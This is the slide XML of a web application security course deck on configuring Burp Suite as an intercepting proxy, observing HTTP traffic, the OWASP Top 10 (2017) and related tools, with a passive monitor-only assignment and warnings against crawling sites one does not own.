          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And select it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3B763-136A-4E47-B01F-43987339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6D845-BD1B-2B42-BC71-5C7CA06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/>
              <a:t>Navigate to the Network Tab and select settings… for Connection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3B849-2013-DA4E-9766-C277DAA3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E1C92-5A02-7D4A-B8C9-C260B297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 selection from “Use system proxy settings” to “Manual proxy configuration and enter “127.0.0.1” for “HTTP Proxy” and “8080” for “Port”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, select check box for “Use this proxy server for all protocols”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete reference to localhost and 127.0.0.1 from the no proxy list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select “OK” when done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser is now setup to use burpsuite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See next slide for example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3FB96-5524-F14A-8054-A76D90E2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9B1F9-9424-A143-BB7B-749897EE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4" y="1600200"/>
            <a:ext cx="414563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B7CF4-D75D-9346-86FC-4B9DCACE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7B19C-F3B6-3C47-A97F-FAEDD80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Look Like This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2136A-62B3-3840-B515-BC06967F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69003-1FB2-3340-9242-D4F244D6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browser, navigate to google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser will hang and look busy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the “Proxy” tab in burpsuite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burpsuite is waiting for you, select forward</a:t>
            </a:r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7AC7F0-C889-BE48-AC3D-B26F0792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63FDB-BC15-B94F-B2FA-B1F96DF6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web application security and web application penetration testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="137160" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Owasp.org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59095"/>
            <a:ext cx="10096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B51B-A09B-114D-A8C5-E01F1C5F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DC7C4-657C-984C-BABF-DAC011696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03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“I understand the Risks” and follow prompts to add an exception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CD45E-3F8D-054C-8554-84AAE3AB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4A47-568F-FA43-BF77-67B04270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829005-EF1C-F44E-9193-1A3ED3A9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EC980-B554-E047-9FB1-2CF1B132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have to hit forward a number of times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You may want to click “Intercept is on” to turn it off and save hitting the forward button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eventually, all traffic is forwarded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, select “HTTP history” and see what you have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96871-92AF-9544-9513-177ED296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3C84-D838-AC45-B511-97BCCB1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traffic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01000" cy="31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4D9FD-1A0B-9E41-B203-BB9FD10C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4CD67-C74C-3A44-83BE-4BAC1E7B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3FCDA-BFB1-234A-BA5F-D2E79E46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FC1AB-92A3-C54D-9628-111B84D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Results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72AE4-5935-7B4C-846C-D23FDCB9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5C7C4-172D-884F-B9C6-5B4B420C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/>
              <a:t>Under “Repeater”, select “Action”, then select “Save Entire History”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465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11583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2C2E-E393-C449-B046-D515AEAC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02826-01AE-3D41-B27C-24DA510F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8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Now, Lets Go Somewhere More Interesting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Restart burpsuite and turn intercept off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now navigate to temple.edu and look around the sitetemple.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look over the results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E9D87-B8B8-E649-800D-C331E8B3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E071-2F6A-EF41-93E9-F54131AC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9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Temple.edu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FD6E8-A514-774C-B440-F4D46A89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C492-CB04-5342-AA8E-FED0F01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98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tell from this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First we can see what we are telling temple about us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Browser is Iceweasel, a derivative of Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What versions we are running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What exactly is If-None-Match: “1414416188-1”?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8305800" cy="156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676D4-1987-6B43-AA2C-94EC7D57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0CF2D-A604-0543-92B0-86D61334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OWASP stands for the Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Founded in 2001 as a charitable organization dedicated to improving Web Application Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creators and publishers of the OWASP top 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hosts numerous Web App tools and projects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8BCC-B83B-2B48-8158-526ECAF8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73622-5CC4-F044-BC65-62225E61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7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Darth Vader says “Come to the Dark Side, We’ve got Cookies”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="10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worse “Hex”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9" y="2590800"/>
            <a:ext cx="7620000" cy="16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35" y="4800600"/>
            <a:ext cx="7620000" cy="138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A2D64-058B-D543-89B2-33989490E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90CB5-30E1-BA42-ADE9-A0700FCF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907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We’ve Got Both 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 There’s both a request and a response tab.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6524"/>
            <a:ext cx="8229600" cy="18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0DACF-84CD-4843-BC12-C7A76B8A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FFDEF-993A-A547-BCB6-312CFDD6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1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Interesting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Adds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other outside references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29600" cy="42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199"/>
            <a:ext cx="8197696" cy="315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B7566-664B-7E40-9048-47D7823E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4041D-AC56-C643-B7B2-0CECC3BA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75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Alerts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few things to look at</a:t>
            </a:r>
          </a:p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6950"/>
            <a:ext cx="823873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ECB6F-BA54-F747-B5EB-3060A1DA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029EE-45F1-AD4B-9698-F86C3DBE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0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this was a real Web App Test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigate the web site recording everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review looking for interesting leads to follow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set Proxy to crawl site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(DO NOT DO THIS FOR THIS COURSE UNLESS YOU ARE ON A TEST SITE YOU OWN)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1DA8-243E-A143-B1DD-132A7956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4EE46-D11F-0D48-B376-E7CBD10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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the “Free” version of burpsuite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of the more interesting features are turned off or limited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intruder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21050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http://portswigger.net/burp/download.html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729CC5-76DC-AD4A-AB4E-EA6BE8DB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5EF591-6C26-C646-8E11-110EE5E0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covered just one proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different proxies have different strengths and weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For instance, Webscarab will flag potential XSS automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, OWASPs ZAP Tool (Zed Attack Proxy) has many of the features only available in the Pro version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BurpSuite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D519D-4E06-7445-925C-3595B27E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E944D-1D20-9748-8C68-497E879D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0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Man's Substitute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Internet Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F12 Developer Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows user to at least see the code loaded in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often worth looking at as developers sometimes leave comments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B557E-DAA2-8948-BB83-D7D2F6CE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A251-4EC0-E846-B594-3FADBBB7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86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an Intercepting Proxy, look at a Website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choose a site that interests you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review what you find and create an executive summary and three page PowerPoint as if you were reporting out for an initial Pen Test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember – Do not alter any data – Monitor and Record Only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CBBD-8ECB-DF42-A080-C6FA4C3F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85EC9-777C-844F-9343-C15FD857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6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next week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecurityShepherd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/OWASP/SecurityShepherd/releases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download Security Dojo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://sourceforge.net/projects/websecuritydojo/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Plan for next week will be to walk through some of the exploits live, so get both Shepherd and Dojo working on your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C86CE-22C9-364A-B14A-F0FACE96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4E929-E114-0E49-AE82-0742DDE2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7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OWASP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Documentation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ZAP: Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Testing Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Juice Shop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cheat sheets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889F2-852D-AC43-8320-14B7C95E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2897-CED8-B94D-AB13-F3992DE9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4FDD61-40AC-4DF5-9581-D47291BDC8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3" y="2638425"/>
            <a:ext cx="6429375" cy="20002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D69FB-EE21-CD4B-96BA-C2E3181E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FA98-EFF3-D04B-8745-179495F4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OWASP Juice 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917123"/>
            <a:ext cx="8677297" cy="3442854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deliberately insecure web app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demonstrates the flaws of the Top 10 and more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be reconfigured for custom purpose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BBE20C-D01F-514B-B1AC-60F35A247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76918-C9D4-1047-805F-E54D036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OWASP Top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2017 (New)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A1 – Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A2 – Broken Authentication and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A3 – Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A5 -  Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A6 – Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A7 – Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A8 – Insecure Deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A9 – Using Known Vulnerable Components </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017-A10 – Insufficient Logging &amp; Monitoring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073333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https://www.owasp.org/index.php/Top_10-2017_Top_10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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DFE8887-F226-6045-8D2B-25EF219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B3E639-9808-FE4C-83D4-E7E98C55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89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3A84CDB579FB4CB73CBB174DC1AAB9" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="b9f9f5803faf8a7166f60b0ca96ecd51">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="51e21843-a409-463b-9741-4644d85965ad" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c7a36989acf51c2ddadf02c43336559d" ns2:_="">
    <xsd:import namespace="51e21843-a409-463b-9741-4644d85965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21843-a409-463b-9741-4644d8596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8CBCC9-4EB7-482B-A0A4-A518F37376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4E7079A-C48C-4977-B38C-3B96CE0A9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e21843-a409-463b-9741-4644d85965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C18B1A-51A6-48E7-B179-93DC538AFD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4025</TotalTime>
  <Words>2444</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>506</Paragraphs>
  <Slides>70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How hard can web programming be?</vt:lpstr>
      <vt:lpstr>Web Application Security</vt:lpstr>
      <vt:lpstr>Where Do We Start</vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>OWASP tools</vt:lpstr>
      <vt:lpstr>OWASP Juice Shop</vt:lpstr>
      <vt:lpstr>The OWASP Top 10</vt:lpstr>
      <vt:lpstr>Tools for reconnaissance and attack</vt:lpstr>
      <vt:lpstr>1. Injection</vt:lpstr>
      <vt:lpstr>Injection mitigation</vt:lpstr>
      <vt:lpstr>2. Broken Authentication</vt:lpstr>
      <vt:lpstr>Broken Authentication mitigation</vt:lpstr>
      <vt:lpstr>3. Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Sensitive Data Exposure mitigation</vt:lpstr>
      <vt:lpstr>4. XML External Entities (XXE)</vt:lpstr>
      <vt:lpstr>XML External Entities (XXE) mitigation</vt:lpstr>
      <vt:lpstr>5. Broken Access Control</vt:lpstr>
      <vt:lpstr>Broken Access Control mitigation</vt:lpstr>
      <vt:lpstr>6. Security Misconfiguration</vt:lpstr>
      <vt:lpstr>Security Misconfiguration mitigation</vt:lpstr>
      <vt:lpstr>7. Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS) mitigation</vt:lpstr>
      <vt:lpstr>8. Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Insecure Deserialization mitigation</vt:lpstr>
      <vt:lpstr>9. Using Components with Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>9. Using Components with Known Vulnerabilities demo</vt:lpstr>
      <vt:lpstr>Using Components with Known Vulnerabilities mitigation</vt:lpstr>
      <vt:lpstr>10: Insufficient Logging &amp; Monitoring</vt:lpstr>
      <vt:lpstr>Insufficient Logging &amp; Monitoring mitigation</vt:lpstr>
      <vt:lpstr>Former Top 10 issues</vt:lpstr>
      <vt:lpstr>OWASP chapters</vt:lpstr>
      <vt:lpstr>Resources</vt:lpstr>
      <vt:lpstr>OWASP Cheat sheets</vt:lpstr>
      <vt:lpstr>OWASP Cheat sheets</vt:lpstr>
      <vt:lpstr>A Little About Browsers</vt:lpstr>
      <vt:lpstr>A Little More About Browsers</vt:lpstr>
      <vt:lpstr>Now What</vt:lpstr>
      <vt:lpstr>What’s an Intercepting Proxy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Should Look Like This</vt:lpstr>
      <vt:lpstr>Now We Can Test</vt:lpstr>
      <vt:lpstr>Browser Knows Something is Up</vt:lpstr>
      <vt:lpstr>Browser Knows Something is Up</vt:lpstr>
      <vt:lpstr>Continuing</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>More Results</vt:lpstr>
      <vt:lpstr>More Results</vt:lpstr>
      <vt:lpstr>Saving Our Results</vt:lpstr>
      <vt:lpstr>Now, Lets Go Somewhere More Interesting</vt:lpstr>
      <vt:lpstr>Temple.edu</vt:lpstr>
      <vt:lpstr>Some Basics</vt:lpstr>
      <vt:lpstr>But Wait, There’s More</vt:lpstr>
      <vt:lpstr>We’ve Got Both Sides</vt:lpstr>
      <vt:lpstr>A Few Interesting Things</vt:lpstr>
      <vt:lpstr>Check The Alerts</vt:lpstr>
      <vt:lpstr>What Now</vt:lpstr>
      <vt:lpstr>A Few More Things</vt:lpstr>
      <vt:lpstr>A Few More Things</vt:lpstr>
      <vt:lpstr>Poor Man's Substitute</vt:lpstr>
      <vt:lpstr>Assignment 3</vt:lpstr>
      <vt:lpstr>Next Week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295</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-08-27T02:09:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-26T21:27:20Z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0x010100463A84CDB579FB4CB73CBB174DC1AAB9</vt:lpwstr>
  </property>
</Properties>
</file>